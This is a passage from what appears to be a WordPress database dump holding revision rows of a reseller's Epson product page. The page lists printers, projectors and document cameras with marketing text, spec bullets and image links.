Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:53:28','2019-09-26 02:53:28','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3496,1,'2019-09-26 10:53:54','2019-09-26 02:53:54','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" 